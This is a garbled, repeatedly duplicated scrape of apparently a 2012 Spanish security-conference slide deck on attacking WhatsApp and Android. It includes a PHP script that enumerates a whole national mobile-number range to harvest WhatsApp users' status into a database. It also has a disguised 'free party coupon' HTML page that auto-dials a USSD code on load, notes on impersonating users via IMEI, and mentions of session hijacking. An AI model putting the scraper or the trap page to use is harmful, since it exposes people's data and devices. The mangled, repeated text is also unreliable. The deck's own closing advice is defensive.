contactos cuentan con una cuenta activada
Para eso se conecta a una URL y consulta el estado
de tus contactos por ejemplo
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=ltAgtampme=ltBgtampu[]=ltCgt
ltAgtCoacutedigo de paiacutes del nuacutemero a consultar
ltBgt Nuacutemero a consultar
ltCgt Cualquier nuacutemero de WhatsApp (o el mismo nuacutemero)
Perohellip es soacutelo un simple MD5
Estado y mensaje del Whatsapp
Nuacutemero del teleacutefono consultado
Nuacutemero del teleacutefono consultado
iquestCuaacutenta gente tiene Whatsapp en el Peruacute
bull El ministerio de transportes y comunicaciones nos daraacute
una manito
Script para la verificacioacuten de usuarios y estado en Whatsapp
AQUIacute VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR
ltphp
mysql_connect(localhostrootldquopassword)
mysql_select_db(limahakc2012)
for($i=970000000 $ilt=979999999$i++)
$whatsapp =httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=$iampu[]=$i
$ch = curl_init()
curl_setopt($ch CURLOPT_RETURNTRANSFER 1)
curl_setopt($chCURLOPT_USERAGENTWhatsApp267 iPhone_OS501 DeviceUnknown_(iPhone41))
curl_setopt($ch CURLOPT_URL $whatsapp)
$cuerpo = curl_exec($ch)
curl_close($ch)
if (preg_match(ltkeygt$cuerpo))
$explodeo_datos = explode(ltdictgt$cuerpo)
$explodeo_estado = explode(ltkeygtSltkeygt$explodeo_datos[1])
$explodeo_estado = explode(ltkeygtJIDltkeygt$explodeo_estado[1])
$query1 =insert into WhatsApp_users3 (numeromensajestatus) values ($i$$explodeo_estado[0]1)
mysql_query($query1)
gt
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=973861650ampu[]=973861650
EL ATAQUE
iquestCoacutemo enviacutea Whatsapp los mensajes
bull WhatsApp tiene un mecanismo de autenticacioacuten basado en SASL DIGEST ndash MD5
bull Envia un CHALLENGE (RETO) formado por el JID (jabber id) y password pero obviamente el password no se enviacutea ya que sirve para generar el CHALLENGE (MD5)
bull iquestPASSWORD Pero si nunca pusimos un password
bull El password es
bull Android IME (International Mobile Equipment Identity)
bull Iphone y otros la MAC
WhatsApp - API
bull API no oficial de WhatsApp
bull Estaacute bajo licencia MIT ndash refer to the source code for the
extra line
INGENIERIA REVERSA
El ataque obteniendo el IMEI
bull Si obtenemos el IMEI podemos suplantar una identidad de
alguien y ademas recibir sus mensajes
bull OJO Si te haces pasar por esa persona y recibes los
mensajes la verdadera persona no los recibiraacute
bull Moraleja
ldquoEl celular es como el calzoncillo hellip
No se presta a nadiehellip a nadierdquo
EL ATAQUE
Atacando Android
Atacando Android
bull Utilizaremos el Android Virtual
Device para hacer nuestras
pruebas
bull El objetivo es obtener
informacioacuten sensible de los
teleacutefonos celulares
bull Lo maacutes importante es tener
actualizado siempre el celular
bull A veces no basta con tenerlo
actualizado porque soacutelo se sacan
actualizaciones para los uacuteltimos
modelos
Atacando Android
bull Utilizaremos un moacutedulo auxiliar de Metasploit para realizar
el ataque
Atacando Android
EL ATAQUE
Coacutedigos USSD
El USSD (acroacutenimo de Unstructured Supplementary Service Data Servicio Suplementario de Datos no Estructurados en ingleacutes) es un servicio para el enviacuteo de datos a traveacutes de moacuteviles GSM al igual que el SMS Es usado normalmente para comunicacioacuten con el proveedor de telefoniacutea generalmente para servicios de mensajeriacutea en tiempo real
Aquiacute algunos coacutedigos USSD 06 150 27673855 (no deberiacuteas ejecutar este)
Coacutedigos USSD
Asiacute como existe los links para enviar correo lta mailtomailmailcom helliphellipgt Enviar email ltagt
Tambieacuten existe el mail para ldquoLLAMARrdquo lta href=tel987654321gtllamar LIMAHACKltagt
Algunos coacutedigos USSD no necesitan la intervencioacuten de ldquomarcadordquo para ser ejecutados simplemente se ejecutan pueden probar esto
06 Entonces que pasa sihelliphellip
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
![Page 8: Presentación de PowerPoint - | Blog de Omar Android... · Script para la verificación de usuarios y estado en Whatsapp AQUÍ VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR](https://reader031.vdocuments.pub/reader031/viewer/2022030908/5b508ba97f8b9a166e8ec66a/html5/thumbnails/8.jpg)
Requisitos
bull Tener el Android rooteado (super privilegios) Todas las herramientas interesantes requieren de super-privilegios
bull Analizar la mejor situacioacuten para realizar un ataque
bull Utiliza tu ldquoAndroidrdquo es un gran amigo
Atacando Windows
Tool Anti (Android Network Toolkit)
httpwwwzimperiumcom
Con Anti podemos
Buscar vulnerabilidades
Auditoriacutea de passwords
Ataques de man in the middle
Ejecutar comandos en el SO
Descubrir traacutefico inseguro en la red
Atacando Windows
Atacando Windows
USO DE NMAP
SCANEO DE PUERTOS
DETECCIOacuteN DE SIST OPERATIVO
SCRIPT DE VERIFICACIOacuteN DE
VULNERABILIDADES
Atacando Windows
Atacando una red LAN
bull Hace session hijacking (secuestro de sesiones) a aplicaciones web conocidas (Facebook Hotmail Twitter)
bull El coacutedigo fuente es libre httpdroidsheepde
bull Lo retiraron del Google Play debido a que fue considerado una herramienta para hackear WTF
bull La comunidad XDA-developers sigue sacando nuevas versiones del software (httpforumxda-developerscom)
Atacando una red LAN
Funcionamiento Session Hijacking
1
El usuario ha ingresado normalmente a una aplicacioacuten web comercial o corporativo como bull Hotmail bull Facebook bull Twitter
DROIDSHEEP capturas las cookies asociadas a la sesioacuten creada y las utiliza No es necesario capturar la contrasentildea
2
Atacando una red LAN Funcionamiento Session Hijacking
bull Droidsheep reconoce las cookies de aplicaciones como
Facebook y Hotmail ademaacutes te puedes enviar las
cookies por correo electroacutenico
Atacando una red LAN
Anaacutelisis de Traacutefico Android
bull Cada vez utilizamos nuestros
celulares para conectarnos a
Internet
bull La mayoriacutea de las personas
se conecta a redes wireless
abiertas Como TUacute
bull Muchas aplicaciones no
encriptan la informacioacuten que
enviacutean las enviacutean en texto
plano
iquestPor queacute es interesante analizar el traacutefico de redhellip
iquestPor queacute es interesante analizar el traacutefico de redhellip
Anaacutelisis de traacutefico - Whatsapp
bull Whatsapp se ha convertido en un mecanismo para el enviacuteo de mensajes muy popular
bull Es muy parecido a los SMS pero gratuito (hasta el momento)
bull Tiene serios problemas para dar seguridad a la informacioacuten que enviacutea hacia internet porque enviaba todo en texto claro
bull Ahora enviacutea la informacioacuten con un HASH MD5
Perohellip es soacutelo un simple MD5
bull Whatsapp tiene serios problemas de seguridad
analicemos
Cada vez que Whatsapp inicia debe verificar si tus
contactos cuentan con una cuenta activada
Para eso se conecta a una URL y consulta el estado
de tus contactos por ejemplo
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=ltAgtampme=ltBgtampu[]=ltCgt
ltAgtCoacutedigo de paiacutes del nuacutemero a consultar
ltBgt Nuacutemero a consultar
ltCgt Cualquier nuacutemero de WhatsApp (o el mismo nuacutemero)
Perohellip es soacutelo un simple MD5
Estado y mensaje del Whatsapp
Nuacutemero del teleacutefono consultado
Nuacutemero del teleacutefono consultado
iquestCuaacutenta gente tiene Whatsapp en el Peruacute
bull El ministerio de transportes y comunicaciones nos daraacute
una manito
Script para la verificacioacuten de usuarios y estado en Whatsapp
AQUIacute VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR
ltphp
mysql_connect(localhostrootldquopassword)
mysql_select_db(limahakc2012)
for($i=970000000 $ilt=979999999$i++)
$whatsapp =httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=$iampu[]=$i
$ch = curl_init()
curl_setopt($ch CURLOPT_RETURNTRANSFER 1)
curl_setopt($chCURLOPT_USERAGENTWhatsApp267 iPhone_OS501 DeviceUnknown_(iPhone41))
curl_setopt($ch CURLOPT_URL $whatsapp)
$cuerpo = curl_exec($ch)
curl_close($ch)
if (preg_match(ltkeygt$cuerpo))
$explodeo_datos = explode(ltdictgt$cuerpo)
$explodeo_estado = explode(ltkeygtSltkeygt$explodeo_datos[1])
$explodeo_estado = explode(ltkeygtJIDltkeygt$explodeo_estado[1])
$query1 =insert into WhatsApp_users3 (numeromensajestatus) values ($i$$explodeo_estado[0]1)
mysql_query($query1)
gt
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=973861650ampu[]=973861650
EL ATAQUE
iquestCoacutemo enviacutea Whatsapp los mensajes
bull WhatsApp tiene un mecanismo de autenticacioacuten basado en SASL DIGEST ndash MD5
bull Envia un CHALLENGE (RETO) formado por el JID (jabber id) y password pero obviamente el password no se enviacutea ya que sirve para generar el CHALLENGE (MD5)
bull iquestPASSWORD Pero si nunca pusimos un password
bull El password es
bull Android IME (International Mobile Equipment Identity)
bull Iphone y otros la MAC
WhatsApp - API
bull API no oficial de WhatsApp
bull Estaacute bajo licencia MIT ndash refer to the source code for the
extra line
INGENIERIA REVERSA
El ataque obteniendo el IMEI
bull Si obtenemos el IMEI podemos suplantar una identidad de
alguien y ademas recibir sus mensajes
bull OJO Si te haces pasar por esa persona y recibes los
mensajes la verdadera persona no los recibiraacute
bull Moraleja
ldquoEl celular es como el calzoncillo hellip
No se presta a nadiehellip a nadierdquo
EL ATAQUE
Atacando Android
Atacando Android
bull Utilizaremos el Android Virtual
Device para hacer nuestras
pruebas
bull El objetivo es obtener
informacioacuten sensible de los
teleacutefonos celulares
bull Lo maacutes importante es tener
actualizado siempre el celular
bull A veces no basta con tenerlo
actualizado porque soacutelo se sacan
actualizaciones para los uacuteltimos
modelos
Atacando Android
bull Utilizaremos un moacutedulo auxiliar de Metasploit para realizar
el ataque
Atacando Android
EL ATAQUE
Coacutedigos USSD
El USSD (acroacutenimo de Unstructured Supplementary Service Data Servicio Suplementario de Datos no Estructurados en ingleacutes) es un servicio para el enviacuteo de datos a traveacutes de moacuteviles GSM al igual que el SMS Es usado normalmente para comunicacioacuten con el proveedor de telefoniacutea generalmente para servicios de mensajeriacutea en tiempo real
Aquiacute algunos coacutedigos USSD 06 150 27673855 (no deberiacuteas ejecutar este)
Coacutedigos USSD
Asiacute como existe los links para enviar correo lta mailtomailmailcom helliphellipgt Enviar email ltagt
Tambieacuten existe el mail para ldquoLLAMARrdquo lta href=tel987654321gtllamar LIMAHACKltagt
Algunos coacutedigos USSD no necesitan la intervencioacuten de ldquomarcadordquo para ser ejecutados simplemente se ejecutan pueden probar esto
06 Entonces que pasa sihelliphellip
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
![Page 9: Presentación de PowerPoint - | Blog de Omar Android... · Script para la verificación de usuarios y estado en Whatsapp AQUÍ VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR](https://reader031.vdocuments.pub/reader031/viewer/2022030908/5b508ba97f8b9a166e8ec66a/html5/thumbnails/9.jpg)
Atacando Windows
Tool Anti (Android Network Toolkit)
httpwwwzimperiumcom
Con Anti podemos
Buscar vulnerabilidades
Auditoriacutea de passwords
Ataques de man in the middle
Ejecutar comandos en el SO
Descubrir traacutefico inseguro en la red
Atacando Windows
Atacando Windows
USO DE NMAP
SCANEO DE PUERTOS
DETECCIOacuteN DE SIST OPERATIVO
SCRIPT DE VERIFICACIOacuteN DE
VULNERABILIDADES
Atacando Windows
Atacando una red LAN
bull Hace session hijacking (secuestro de sesiones) a aplicaciones web conocidas (Facebook Hotmail Twitter)
bull El coacutedigo fuente es libre httpdroidsheepde
bull Lo retiraron del Google Play debido a que fue considerado una herramienta para hackear WTF
bull La comunidad XDA-developers sigue sacando nuevas versiones del software (httpforumxda-developerscom)
Atacando una red LAN
Funcionamiento Session Hijacking
1
El usuario ha ingresado normalmente a una aplicacioacuten web comercial o corporativo como bull Hotmail bull Facebook bull Twitter
DROIDSHEEP capturas las cookies asociadas a la sesioacuten creada y las utiliza No es necesario capturar la contrasentildea
2
Atacando una red LAN Funcionamiento Session Hijacking
bull Droidsheep reconoce las cookies de aplicaciones como
Facebook y Hotmail ademaacutes te puedes enviar las
cookies por correo electroacutenico
Atacando una red LAN
Anaacutelisis de Traacutefico Android
bull Cada vez utilizamos nuestros
celulares para conectarnos a
Internet
bull La mayoriacutea de las personas
se conecta a redes wireless
abiertas Como TUacute
bull Muchas aplicaciones no
encriptan la informacioacuten que
enviacutean las enviacutean en texto
plano
iquestPor queacute es interesante analizar el traacutefico de redhellip
iquestPor queacute es interesante analizar el traacutefico de redhellip
Anaacutelisis de traacutefico - Whatsapp
bull Whatsapp se ha convertido en un mecanismo para el enviacuteo de mensajes muy popular
bull Es muy parecido a los SMS pero gratuito (hasta el momento)
bull Tiene serios problemas para dar seguridad a la informacioacuten que enviacutea hacia internet porque enviaba todo en texto claro
bull Ahora enviacutea la informacioacuten con un HASH MD5
Perohellip es soacutelo un simple MD5
bull Whatsapp tiene serios problemas de seguridad
analicemos
Cada vez que Whatsapp inicia debe verificar si tus
contactos cuentan con una cuenta activada
Para eso se conecta a una URL y consulta el estado
de tus contactos por ejemplo
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=ltAgtampme=ltBgtampu[]=ltCgt
ltAgtCoacutedigo de paiacutes del nuacutemero a consultar
ltBgt Nuacutemero a consultar
ltCgt Cualquier nuacutemero de WhatsApp (o el mismo nuacutemero)
Perohellip es soacutelo un simple MD5
Estado y mensaje del Whatsapp
Nuacutemero del teleacutefono consultado
Nuacutemero del teleacutefono consultado
iquestCuaacutenta gente tiene Whatsapp en el Peruacute
bull El ministerio de transportes y comunicaciones nos daraacute
una manito
Script para la verificacioacuten de usuarios y estado en Whatsapp
AQUIacute VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR
ltphp
mysql_connect(localhostrootldquopassword)
mysql_select_db(limahakc2012)
for($i=970000000 $ilt=979999999$i++)
$whatsapp =httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=$iampu[]=$i
$ch = curl_init()
curl_setopt($ch CURLOPT_RETURNTRANSFER 1)
curl_setopt($chCURLOPT_USERAGENTWhatsApp267 iPhone_OS501 DeviceUnknown_(iPhone41))
curl_setopt($ch CURLOPT_URL $whatsapp)
$cuerpo = curl_exec($ch)
curl_close($ch)
if (preg_match(ltkeygt$cuerpo))
$explodeo_datos = explode(ltdictgt$cuerpo)
$explodeo_estado = explode(ltkeygtSltkeygt$explodeo_datos[1])
$explodeo_estado = explode(ltkeygtJIDltkeygt$explodeo_estado[1])
$query1 =insert into WhatsApp_users3 (numeromensajestatus) values ($i$$explodeo_estado[0]1)
mysql_query($query1)
gt
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=973861650ampu[]=973861650
EL ATAQUE
iquestCoacutemo enviacutea Whatsapp los mensajes
bull WhatsApp tiene un mecanismo de autenticacioacuten basado en SASL DIGEST ndash MD5
bull Envia un CHALLENGE (RETO) formado por el JID (jabber id) y password pero obviamente el password no se enviacutea ya que sirve para generar el CHALLENGE (MD5)
bull iquestPASSWORD Pero si nunca pusimos un password
bull El password es
bull Android IME (International Mobile Equipment Identity)
bull Iphone y otros la MAC
WhatsApp - API
bull API no oficial de WhatsApp
bull Estaacute bajo licencia MIT ndash refer to the source code for the
extra line
INGENIERIA REVERSA
El ataque obteniendo el IMEI
bull Si obtenemos el IMEI podemos suplantar una identidad de
alguien y ademas recibir sus mensajes
bull OJO Si te haces pasar por esa persona y recibes los
mensajes la verdadera persona no los recibiraacute
bull Moraleja
ldquoEl celular es como el calzoncillo hellip
No se presta a nadiehellip a nadierdquo
EL ATAQUE
Atacando Android
Atacando Android
bull Utilizaremos el Android Virtual
Device para hacer nuestras
pruebas
bull El objetivo es obtener
informacioacuten sensible de los
teleacutefonos celulares
bull Lo maacutes importante es tener
actualizado siempre el celular
bull A veces no basta con tenerlo
actualizado porque soacutelo se sacan
actualizaciones para los uacuteltimos
modelos
Atacando Android
bull Utilizaremos un moacutedulo auxiliar de Metasploit para realizar
el ataque
Atacando Android
EL ATAQUE
Coacutedigos USSD
El USSD (acroacutenimo de Unstructured Supplementary Service Data Servicio Suplementario de Datos no Estructurados en ingleacutes) es un servicio para el enviacuteo de datos a traveacutes de moacuteviles GSM al igual que el SMS Es usado normalmente para comunicacioacuten con el proveedor de telefoniacutea generalmente para servicios de mensajeriacutea en tiempo real
Aquiacute algunos coacutedigos USSD 06 150 27673855 (no deberiacuteas ejecutar este)
Coacutedigos USSD
Asiacute como existe los links para enviar correo lta mailtomailmailcom helliphellipgt Enviar email ltagt
Tambieacuten existe el mail para ldquoLLAMARrdquo lta href=tel987654321gtllamar LIMAHACKltagt
Algunos coacutedigos USSD no necesitan la intervencioacuten de ldquomarcadordquo para ser ejecutados simplemente se ejecutan pueden probar esto
06 Entonces que pasa sihelliphellip
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
![Page 10: Presentación de PowerPoint - | Blog de Omar Android... · Script para la verificación de usuarios y estado en Whatsapp AQUÍ VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR](https://reader031.vdocuments.pub/reader031/viewer/2022030908/5b508ba97f8b9a166e8ec66a/html5/thumbnails/10.jpg)
Atacando Windows
Atacando Windows
USO DE NMAP
SCANEO DE PUERTOS
DETECCIOacuteN DE SIST OPERATIVO
SCRIPT DE VERIFICACIOacuteN DE
VULNERABILIDADES
Atacando Windows
Atacando una red LAN
bull Hace session hijacking (secuestro de sesiones) a aplicaciones web conocidas (Facebook Hotmail Twitter)
bull El coacutedigo fuente es libre httpdroidsheepde
bull Lo retiraron del Google Play debido a que fue considerado una herramienta para hackear WTF
bull La comunidad XDA-developers sigue sacando nuevas versiones del software (httpforumxda-developerscom)
Atacando una red LAN
Funcionamiento Session Hijacking
1
El usuario ha ingresado normalmente a una aplicacioacuten web comercial o corporativo como bull Hotmail bull Facebook bull Twitter
DROIDSHEEP capturas las cookies asociadas a la sesioacuten creada y las utiliza No es necesario capturar la contrasentildea
2
Atacando una red LAN Funcionamiento Session Hijacking
bull Droidsheep reconoce las cookies de aplicaciones como
Facebook y Hotmail ademaacutes te puedes enviar las
cookies por correo electroacutenico
Atacando una red LAN
Anaacutelisis de Traacutefico Android
bull Cada vez utilizamos nuestros
celulares para conectarnos a
Internet
bull La mayoriacutea de las personas
se conecta a redes wireless
abiertas Como TUacute
bull Muchas aplicaciones no
encriptan la informacioacuten que
enviacutean las enviacutean en texto
plano
iquestPor queacute es interesante analizar el traacutefico de redhellip
iquestPor queacute es interesante analizar el traacutefico de redhellip
Anaacutelisis de traacutefico - Whatsapp
bull Whatsapp se ha convertido en un mecanismo para el enviacuteo de mensajes muy popular
bull Es muy parecido a los SMS pero gratuito (hasta el momento)
bull Tiene serios problemas para dar seguridad a la informacioacuten que enviacutea hacia internet porque enviaba todo en texto claro
bull Ahora enviacutea la informacioacuten con un HASH MD5
Perohellip es soacutelo un simple MD5
bull Whatsapp tiene serios problemas de seguridad
analicemos
Cada vez que Whatsapp inicia debe verificar si tus
contactos cuentan con una cuenta activada
Para eso se conecta a una URL y consulta el estado
de tus contactos por ejemplo
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=ltAgtampme=ltBgtampu[]=ltCgt
ltAgtCoacutedigo de paiacutes del nuacutemero a consultar
ltBgt Nuacutemero a consultar
ltCgt Cualquier nuacutemero de WhatsApp (o el mismo nuacutemero)
Perohellip es soacutelo un simple MD5
Estado y mensaje del Whatsapp
Nuacutemero del teleacutefono consultado
Nuacutemero del teleacutefono consultado
iquestCuaacutenta gente tiene Whatsapp en el Peruacute
bull El ministerio de transportes y comunicaciones nos daraacute
una manito
Script para la verificacioacuten de usuarios y estado en Whatsapp
AQUIacute VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR
ltphp
mysql_connect(localhostrootldquopassword)
mysql_select_db(limahakc2012)
for($i=970000000 $ilt=979999999$i++)
$whatsapp =httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=$iampu[]=$i
$ch = curl_init()
curl_setopt($ch CURLOPT_RETURNTRANSFER 1)
curl_setopt($chCURLOPT_USERAGENTWhatsApp267 iPhone_OS501 DeviceUnknown_(iPhone41))
curl_setopt($ch CURLOPT_URL $whatsapp)
$cuerpo = curl_exec($ch)
curl_close($ch)
if (preg_match(ltkeygt$cuerpo))
$explodeo_datos = explode(ltdictgt$cuerpo)
$explodeo_estado = explode(ltkeygtSltkeygt$explodeo_datos[1])
$explodeo_estado = explode(ltkeygtJIDltkeygt$explodeo_estado[1])
$query1 =insert into WhatsApp_users3 (numeromensajestatus) values ($i$$explodeo_estado[0]1)
mysql_query($query1)
gt
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=973861650ampu[]=973861650
EL ATAQUE
iquestCoacutemo enviacutea Whatsapp los mensajes
bull WhatsApp tiene un mecanismo de autenticacioacuten basado en SASL DIGEST ndash MD5
bull Envia un CHALLENGE (RETO) formado por el JID (jabber id) y password pero obviamente el password no se enviacutea ya que sirve para generar el CHALLENGE (MD5)
bull iquestPASSWORD Pero si nunca pusimos un password
bull El password es
bull Android IME (International Mobile Equipment Identity)
bull Iphone y otros la MAC
WhatsApp - API
bull API no oficial de WhatsApp
bull Estaacute bajo licencia MIT ndash refer to the source code for the
extra line
INGENIERIA REVERSA
El ataque obteniendo el IMEI
bull Si obtenemos el IMEI podemos suplantar una identidad de
alguien y ademas recibir sus mensajes
bull OJO Si te haces pasar por esa persona y recibes los
mensajes la verdadera persona no los recibiraacute
bull Moraleja
ldquoEl celular es como el calzoncillo hellip
No se presta a nadiehellip a nadierdquo
EL ATAQUE
Atacando Android
Atacando Android
bull Utilizaremos el Android Virtual
Device para hacer nuestras
pruebas
bull El objetivo es obtener
informacioacuten sensible de los
teleacutefonos celulares
bull Lo maacutes importante es tener
actualizado siempre el celular
bull A veces no basta con tenerlo
actualizado porque soacutelo se sacan
actualizaciones para los uacuteltimos
modelos
Atacando Android
bull Utilizaremos un moacutedulo auxiliar de Metasploit para realizar
el ataque
Atacando Android
EL ATAQUE
Coacutedigos USSD
El USSD (acroacutenimo de Unstructured Supplementary Service Data Servicio Suplementario de Datos no Estructurados en ingleacutes) es un servicio para el enviacuteo de datos a traveacutes de moacuteviles GSM al igual que el SMS Es usado normalmente para comunicacioacuten con el proveedor de telefoniacutea generalmente para servicios de mensajeriacutea en tiempo real
Aquiacute algunos coacutedigos USSD 06 150 27673855 (no deberiacuteas ejecutar este)
Coacutedigos USSD
Asiacute como existe los links para enviar correo lta mailtomailmailcom helliphellipgt Enviar email ltagt
Tambieacuten existe el mail para ldquoLLAMARrdquo lta href=tel987654321gtllamar LIMAHACKltagt
Algunos coacutedigos USSD no necesitan la intervencioacuten de ldquomarcadordquo para ser ejecutados simplemente se ejecutan pueden probar esto
06 Entonces que pasa sihelliphellip
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
